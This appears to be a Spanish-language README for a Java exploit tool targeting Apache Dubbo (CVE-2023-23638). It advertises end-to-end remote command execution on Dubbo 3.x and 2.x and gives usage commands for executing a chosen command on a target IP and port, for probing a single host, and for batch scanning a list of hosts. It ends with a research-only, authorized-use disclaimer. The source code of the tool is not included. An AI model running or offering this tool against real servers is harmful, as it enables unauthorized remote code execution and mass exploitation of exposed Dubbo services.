
Práctica de explotación de la vulnerabilidad de Apache Dubbo (CVE-2023-23638)
Práctica de ingeniería de explotación de Apache Dubbo (CVE-2023-23638), que cubre el proceso de Dubbo 3.x desde el descubrimiento de servicios hasta la explotación de vulnerabilidades y el echo. Esta herramienta es solo para investigación y aprendizaje. Damos la bienvenida a todos los expertos para que vengan a discutir y aportar valiosas sugerencias.
Esta herramienta admite la explotación completa de CVE-2023-23638 en Dubbo 3.x, cubriendo desde el descubrimiento de servicios hasta la explotación de vulnerabilidades y el echo. También se puede explotar en versiones de Dubbo 2.x, pero es necesario pasar manualmente el nombre del servicio, el nombre del método, etc. Sobre esta vulnerabilidad he escrito dos artículos de análisis:
Esta herramienta es solo para fines de aprendizaje y no contempla muchos problemas de la práctica real, por ejemplo:
Se seguirá actualizando en el futuro
Este proyecto ya no se actualizará. El escaneo y la explotación más completos de Dubbo se publicarán como código abierto en otro proyecto más adelante. ¡Estén atentos!
Gracias al maestro y4tacker por compartir la idea de la deserialización nativa de fastjson
Explotación de vulnerabilidad de una sola URL
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
Detección no destructiva de vulnerabilidades de una sola URL
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
Detección por lotes
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
Inyección de bytecode

Ejecución de comandos

Esta herramienta es solo para investigación y aprendizaje de vulnerabilidades. Si necesita probar la disponibilidad de esta herramienta, configure usted mismo un entorno de máquina objetivo. Al utilizar esta herramienta para realizar detecciones, debe asegurarse de que dicha acción cumple con las leyes y regulaciones locales y de que ha obtenido la autorización suficiente. No escanee objetivos no autorizados. Si usted lleva a cabo cualquier comportamiento ilegal durante el uso de esta herramienta, deberá asumir las consecuencias correspondientes; no asumiremos ninguna responsabilidad legal ni solidaria.